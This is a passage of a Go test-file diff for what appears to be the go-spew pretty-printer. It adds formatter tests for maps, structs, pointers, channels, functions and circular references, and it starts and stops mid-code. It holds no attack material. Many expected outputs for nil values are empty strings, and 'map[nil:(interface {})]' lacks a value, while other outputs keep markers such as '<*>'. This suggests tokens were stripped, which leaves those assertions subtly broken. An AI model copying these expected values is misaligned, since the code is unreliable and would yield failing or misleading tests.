fmt.Sprintf("%p", &pv2) + v2t := "uint16" + v2s := "65535" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) +} + +func addMapFormatterTests() { + // Map with string keys and int vals. + v := map[string]int{"one": 1, "two": 2} + nilMap := map[string]int(nil) + nv := (*map[string]int)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "map[string]int" + vs := "map[one:1 two:2]" + vs2 := "map[two:2 one:1]" + addFormatterTest("%v", v, vs, vs2) + addFormatterTest("%v", pv, "<*>"+vs, "<*>"+vs2) + addFormatterTest("%v", &pv, "<**>"+vs, "<**>"+vs2) + addFormatterTest("%+v", nilMap, "") + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs, vs2) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs, "<*>("+vAddr+")"+vs2) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs, + "<**>("+pvAddr+"->"+vAddr+")"+vs2) + addFormatterTest("%+v", nilMap, "") + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs, "("+vt+")"+vs2) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs, "(*"+vt+")"+vs2) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs, "(**"+vt+")"+vs2) + addFormatterTest("%#v", nilMap, "("+vt+")"+"") + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs, "("+vt+")"+vs2) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs, + "(*"+vt+")("+vAddr+")"+vs2) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs, + "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs2) + addFormatterTest("%#+v", nilMap, "("+vt+")"+"") + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Map with custom formatter type on pointer receiver only keys and vals. + v2 := map[pstringer]pstringer{"one": "1"} + nv2 := (*map[pstringer]pstringer)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "map[spew_test.pstringer]spew_test.pstringer" + v2s := "map[stringer one:stringer 1]" + if spew.UnsafeDisabled { + v2s = "map[one:1]" + } + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Map with interface keys and values. + v3 := map[interface{}]interface{}{"one": 1} + nv3 := (*map[interface{}]interface{})(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "map[interface {}]interface {}" + v3t1 := "string" + v3t2 := "int" + v3s := "map[one:1]" + v3s2 := "map[(" + v3t1 + ")one:(" + v3t2 + ")1]" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2) + addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"") + + // Map with nil interface value + v4 := map[string]interface{}{"nil": nil} + nv4 := (*map[string]interface{})(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "map[string]interface {}" + v4t1 := "interface {}" + v4s := "map[nil:]" + v4s2 := "map[nil:(" + v4t1 + ")]" + addFormatterTest("%v", v4, v4s) + addFormatterTest("%v", pv4, "<*>"+v4s) + addFormatterTest("%v", &pv4, "<**>"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%+v", v4, v4s) + addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s) + addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%#v", v4, "("+v4t+")"+v4s2) + addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s2) + addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s2) + addFormatterTest("%#v", nv4, "(*"+v4t+")"+"") + addFormatterTest("%#+v", v4, "("+v4t+")"+v4s2) + addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s2) + addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s2) + addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"") +} + +func addStructFormatterTests() { + // Struct with primitives. + type s1 struct { + a int8 + b uint8 + } + v := s1{127, 255} + nv := (*s1)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.s1" + vt2 := "int8" + vt3 := "uint8" + vs := "{127 255}" + vs2 := "{a:127 b:255}" + vs3 := "{a:(" + vt2 + ")127 b:(" + vt3 + ")255}" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs2) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs2) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs2) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs3) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs3) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs3) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs3) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs3) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs3) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Struct that contains another struct. + type s2 struct { + s1 s1 + b bool + } + v2 := s2{s1{127, 255}, true} + nv2 := (*s2)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.s2" + v2t2 := "spew_test.s1" + v2t3 := "int8" + v2t4 := "uint8" + v2t5 := "bool" + v2s := "{{127 255} true}" + v2s2 := "{s1:{a:127 b:255} b:true}" + v2s3 := "{s1:(" + v2t2 + "){a:(" + v2t3 + ")127 b:(" + v2t4 + ")255} b:(" + + v2t5 + ")true}" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s2) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s2) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s2) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s3) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s3) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s3) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s3) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s3) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s3) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Struct that contains custom type with Stringer pointer interface via both + // exported and unexported fields. + type s3 struct { + s pstringer + S pstringer + } + v3 := s3{"test", "test2"} + nv3 := (*s3)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "spew_test.s3" + v3t2 := "spew_test.pstringer" + v3s := "{stringer test stringer test2}" + v3sp := v3s + v3s2 := "{s:stringer test S:stringer test2}" + v3s2p := v3s2 + v3s3 := "{s:(" + v3t2 + ")stringer test S:(" + v3t2 + ")stringer test2}" + v3s3p := v3s3 + if spew.UnsafeDisabled { + v3s = "{test test2}" + v3sp = "{test stringer test2}" + v3s2 = "{s:test S:test2}" + v3s2p = "{s:test S:stringer test2}" + v3s3 = "{s:(" + v3t2 + ")test S:(" + v3t2 + ")test2}" + v3s3p = "{s:(" + v3t2 + ")test S:(" + v3t2 + ")stringer test2}" + } + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3sp) + addFormatterTest("%v", &pv3, "<**>"+v3sp) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%+v", v3, v3s2) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s2p) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s2p) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s3) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s3p) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s3p) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s3) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s3p) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s3p) + addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"") + + // Struct that contains embedded struct and field to same struct. + e := embed{"embedstr"} + v4 := embedwrap{embed: &e, e: &e} + nv4 := (*embedwrap)(nil) + pv4 := &v4 + eAddr := fmt.Sprintf("%p", &e) + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "spew_test.embedwrap" + v4t2 := "spew_test.embed" + v4t3 := "string" + v4s := "{<*>{embedstr} <*>{embedstr}}" + v4s2 := "{embed:<*>(" + eAddr + "){a:embedstr} e:<*>(" + eAddr + + "){a:embedstr}}" + v4s3 := "{embed:(*" + v4t2 + "){a:(" + v4t3 + ")embedstr} e:(*" + v4t2 + + "){a:(" + v4t3 + ")embedstr}}" + v4s4 := "{embed:(*" + v4t2 + ")(" + eAddr + "){a:(" + v4t3 + + ")embedstr} e:(*" + v4t2 + ")(" + eAddr + "){a:(" + v4t3 + ")embedstr}}" + addFormatterTest("%v", v4, v4s) + addFormatterTest("%v", pv4, "<*>"+v4s) + addFormatterTest("%v", &pv4, "<**>"+v4s) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%+v", v4, v4s2) + addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s2) + addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s2) + addFormatterTest("%+v", nv4, "") + addFormatterTest("%#v", v4, "("+v4t+")"+v4s3) + addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s3) + addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s3) + addFormatterTest("%#v", nv4, "(*"+v4t+")"+"") + addFormatterTest("%#+v", v4, "("+v4t+")"+v4s4) + addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s4) + addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s4) + addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"") +} + +func addUintptrFormatterTests() { + // Null pointer. + v := uintptr(0) + nv := (*uintptr)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "uintptr" + vs := "" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Address of real variable. + i := 1 + v2 := uintptr(unsafe.Pointer(&i)) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "uintptr" + v2s := fmt.Sprintf("%p", &i) + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) +} + +func addUnsafePointerFormatterTests() { + // Null pointer. + v := unsafe.Pointer(uintptr(0)) + nv := (*unsafe.Pointer)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "unsafe.Pointer" + vs := "" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Address of real variable. + i := 1 + v2 := unsafe.Pointer(&i) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "unsafe.Pointer" + v2s := fmt.Sprintf("%p", &i) + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) +} + +func addChanFormatterTests() { + // Nil channel. + var v chan int + pv := &v + nv := (*chan int)(nil) + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "chan int" + vs := "" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Real channel. + v2 := make(chan int) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "chan int" + v2s := fmt.Sprintf("%p", v2) + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) +} + +func addFuncFormatterTests() { + // Function with no params and no returns. + v := addIntFormatterTests + nv := (*func())(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "func()" + vs := fmt.Sprintf("%p", v) + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") + + // Function with param and no returns. + v2 := TestFormatter + nv2 := (*func(*testing.T))(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "func(*testing.T)" + v2s := fmt.Sprintf("%p", v2) + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s) + addFormatterTest("%v", &pv2, "<**>"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%+v", v2, v2s) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%+v", nv2, "") + addFormatterTest("%#v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s) + addFormatterTest("%#v", nv2, "(*"+v2t+")"+"") + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s) + addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"") + + // Function with multiple params and multiple returns. + var v3 = func(i int, s string) (b bool, err error) { + return true, nil + } + nv3 := (*func(int, string) (bool, error))(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "func(int, string) (bool, error)" + v3s := fmt.Sprintf("%p", v3) + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s) + addFormatterTest("%v", &pv3, "<**>"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%+v", v3, v3s) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%+v", nv3, "") + addFormatterTest("%#v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s) + addFormatterTest("%#v", nv3, "(*"+v3t+")"+"") + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s) + addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"") +} + +func addCircularFormatterTests() { + // Struct that is circular through self referencing. + type circular struct { + c *circular + } + v := circular{nil} + v.c = &v + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.circular" + vs := "{<*>{<*>}}" + vs2 := "{<*>}" + vs3 := "{c:<*>(" + vAddr + "){c:<*>(" + vAddr + ")}}" + vs4 := "{c:<*>(" + vAddr + ")}" + vs5 := "{c:(*" + vt + "){c:(*" + vt + ")}}" + vs6 := "{c:(*" + vt + ")}" + vs7 := "{c:(*" + vt + ")(" + vAddr + "){c:(*" + vt + ")(" + vAddr + + ")}}" + vs8 := "{c:(*" + vt + ")(" + vAddr + ")}" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs2) + addFormatterTest("%v", &pv, "<**>"+vs2) + addFormatterTest("%+v", v, vs3) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs4) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs4) + addFormatterTest("%#v", v, "("+vt+")"+vs5) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs6) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs6) + addFormatterTest("%#+v", v, "("+vt+")"+vs7) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs8) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs8) + + // Structs that are circular through cross referencing. + v2 := xref1{nil} + ts2 := xref2{&v2} + v2.ps2 = &ts2 + pv2 := &v2 + ts2Addr := fmt.Sprintf("%p", &ts2) + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "spew_test.xref1" + v2t2 := "spew_test.xref2" + v2s := "{<*>{<*>{<*>}}}" + v2s2 := "{<*>{<*>}}" + v2s3 := "{ps2:<*>(" + ts2Addr + "){ps1:<*>(" + v2Addr + "){ps2:<*>(" + + ts2Addr + ")}}}" + v2s4 := "{ps2:<*>(" + ts2Addr + "){ps1:<*>(" + v2Addr + ")}}" + v2s5 := "{ps2:(*" + v2t2 + "){ps1:(*" + v2t + "){ps2:(*" + v2t2 + + ")}}}" + v2s6 := "{ps2:(*" + v2t2 + "){ps1:(*" + v2t + ")}}" + v2s7 := "{ps2:(*" + v2t2 + ")(" + ts2Addr + "){ps1:(*" + v2t + + ")(" + v2Addr + "){ps2:(*" + v2t2 + ")(" + ts2Addr + + ")}}}" + v2s8 := "{ps2:(*" + v2t2 + ")(" + ts2Addr + "){ps1:(*" + v2t + + ")(" + v2Addr + ")}}" + addFormatterTest("%v", v2, v2s) + addFormatterTest("%v", pv2, "<*>"+v2s2) + addFormatterTest("%v", &pv2, "<**>"+v2s2) + addFormatterTest("%+v", v2, v2s3) + addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s4) + addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s4) + addFormatterTest("%#v", v2, "("+v2t+")"+v2s5) + addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s6) + addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s6) + addFormatterTest("%#+v", v2, "("+v2t+")"+v2s7) + addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s8) + addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s8) + + // Structs that are indirectly circular. + v3 := indirCir1{nil} + tic2 := indirCir2{nil} + tic3 := indirCir3{&v3} + tic2.ps3 = &tic3 + v3.ps2 = &tic2 + pv3 := &v3 + tic2Addr := fmt.Sprintf("%p", &tic2) + tic3Addr := fmt.Sprintf("%p", &tic3) + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "spew_test.indirCir1" + v3t2 := "spew_test.indirCir2" + v3t3 := "spew_test.indirCir3" + v3s := "{<*>{<*>{<*>{<*>}}}}" + v3s2 := "{<*>{<*>{<*>}}}" + v3s3 := "{ps2:<*>(" + tic2Addr + "){ps3:<*>(" + tic3Addr + "){ps1:<*>(" + + v3Addr + "){ps2:<*>(" + tic2Addr + ")}}}}" + v3s4 := "{ps2:<*>(" + tic2Addr + "){ps3:<*>(" + tic3Addr + "){ps1:<*>(" + + v3Addr + ")}}}" + v3s5 := "{ps2:(*" + v3t2 + "){ps3:(*" + v3t3 + "){ps1:(*" + v3t + + "){ps2:(*" + v3t2 + ")}}}}" + v3s6 := "{ps2:(*" + v3t2 + "){ps3:(*" + v3t3 + "){ps1:(*" + v3t + + ")}}}" + v3s7 := "{ps2:(*" + v3t2 + ")(" + tic2Addr + "){ps3:(*" + v3t3 + ")(" + + tic3Addr + "){ps1:(*" + v3t + ")(" + v3Addr + "){ps2:(*" + v3t2 + + ")(" + tic2Addr + ")}}}}" + v3s8 := "{ps2:(*" + v3t2 + ")(" + tic2Addr + "){ps3:(*" + v3t3 + ")(" + + tic3Addr + "){ps1:(*" + v3t + ")(" + v3Addr + ")}}}" + addFormatterTest("%v", v3, v3s) + addFormatterTest("%v", pv3, "<*>"+v3s2) + addFormatterTest("%v", &pv3, "<**>"+v3s2) + addFormatterTest("%+v", v3, v3s3) + addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s4) + addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s4) + addFormatterTest("%#v", v3, "("+v3t+")"+v3s5) + addFormatterTest("%#v", pv3, 